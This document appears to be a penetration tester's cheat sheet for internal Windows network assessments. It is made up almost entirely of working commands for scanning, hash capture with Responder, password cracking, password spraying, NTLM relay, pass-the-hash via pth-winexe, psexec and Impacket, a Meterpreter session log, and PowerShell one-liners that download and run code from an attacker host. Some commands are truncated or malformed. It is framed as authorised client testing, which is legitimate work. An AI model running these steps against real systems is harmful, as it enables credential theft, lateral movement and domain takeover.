Basic Internal Network test

Slightly less than the minimum standard

Host Discovery

Nmap Ping Scan Private Ranges and start responder

responder -i eth0
nmap -sn -n | tee -a Targets.tmp
nmap -sn -n | tee -a Targets.tmp
nmap -sn -n | tee -a Targets.tmp
# Loud so only use if required
masscan -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
nmap --top-ports 10 -Pn | tee -a Targets.tmp
netdiscover -i eth0 -P

Now cat grep and sort the IP addresses into a file called Targets.txt

Nmap Scans

mkdir Scans
nmap -p 21 -n --open -iL targets -oA Scans/ftp
nmap -p 22 -n --open -iL targets -oA Scans/ssh
nmap -p 23 -n --open -iL targets -oA Scans/telnet
nmap -p 80 -n --open -iL targets -oA Scans/http
nmap -p 443 -n --open -iL targets -oA Scans/https
nmap -p 445 -n --open -iL targets -oA Scans/smb
nmap -p 3389 -n --open -iL targets -oA Scans/rdp
cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt


Start Nessus on discovered IP addresses

Run against all Targets.txt

Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.

for Target in $(cat Targets.txt)
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Auto Scanner" | tee -a Scanner.log
echo "$Target - Scanned: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "TCP Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
#nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "UDP Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
#nmap -sUV -sC --top-ports 200 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
nmap -sUV -sC --top-ports 10 -oN $Target-02-NmapUDP.txt $Target | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Nikto Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
nikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "SSL Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
sslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Directory Scan Started: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
gobuster -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
gobuster -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
for Target in $(cat Targets.txt)
cat $Target-01-NmapTCP.txt | grep /tcp | grep open >> "$Target"_Ports.txt 2> /dev/null
cat $Target-02-NmapUDP.txt | grep /udp | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null
while IFS= read -r port
echo "$Target":"$port" >> ServicesList.txt
done < "$Target"_Ports.txt
rm *_Ports.txt
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "The following services were found:" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
cat ServicesList.txt | tee -a Scanner.log

Check responder for hashes and crack with hashcat

hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules

Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl

cewl -w clientwordlist.txt -d 5 -m 8

Then repeat the cracking process with a good rule list.

Domain enumeration

Get DC List

# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL Targets.txt --open
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
> set type=all

Get user list

rpcclient -U "domain\\username" (DC)
rpcclient $> enumdomusers

Copy list of users to "rpcuserlist.txt" file and sort:

cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.

May be worth checking the password lockout policy with the client if in a sensitive environment.

msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp

When time is up change the password and rerun.

Passwords to try:

Password 2018!

Find open file servers


Find open SMB shares which are available unauthenticated

for i in $(cat 00-Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt

Find open writable shares and search for authenticated file servers:

for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
ctrl + f WRITE (Search for writable folders)


python /root/Data/Tools/EyeWitness/ --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB

[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
HTTP = Off << turn off
DNS = On

Start responder

python -I <interface> -r -d -w
responder -I <interface> -r -d -w

Create a list of targets with SMB signing disabled.

nmap -n -p 137,139,445 --script=smb-security-mode | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt

Now start against the targets

python /usr/share/doc/python-impacket/examples/ -tf smbsigningdisabled.txt

If you capture a high priv users account it will drop the hashes from the system

Now use psexec within metasploit to login to the target

use exploit/windows/smb/psexec
set lhost
set rhost
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.

Then run

python -tf smbsigningdisabled.txt
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 // cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
[email protected]:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 // "select Name from Win32_UserAccount"
[email protected]:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 // "cmd.exe /c whoami > c:\temp\result.txt"
[email protected]:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //$
[email protected]:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //
[email protected]:~# -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 [email protected]
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
[email protected]:~# apt-get update
[email protected]:~# apt-get install freerdp-x11
[email protected]:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on
[*] - Connecting to the server...
[*] - Authenticating to|WORKGROUP as user 'administrator'...
[*] - Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to
[*] Meterpreter session 1 opened ( -> at 2017-04-05 22:48:15 +0200
meterpreter > exit

This will output the local hashes if you capture a domain admins NTLM hash.

Once you have this hash, login to the machine with metasploits psexec pass the hash or


Once on the domain as a windows user run the following:

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"

Once on your attacker machine make sure you have bloodhound installed and then execute:

neoj4 console


Enter your password and upload the csv files you extracted from the target.

Click queries and then find shortest path to domain admin


git clone
cd mitm6
mitm6 -d domain.local

In a new window -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data

Wait 30 mins to an hour for the IPV6 to update

cd data
firefox domain_users_by_group.html

Review output and look for new user and password added when a DA logs in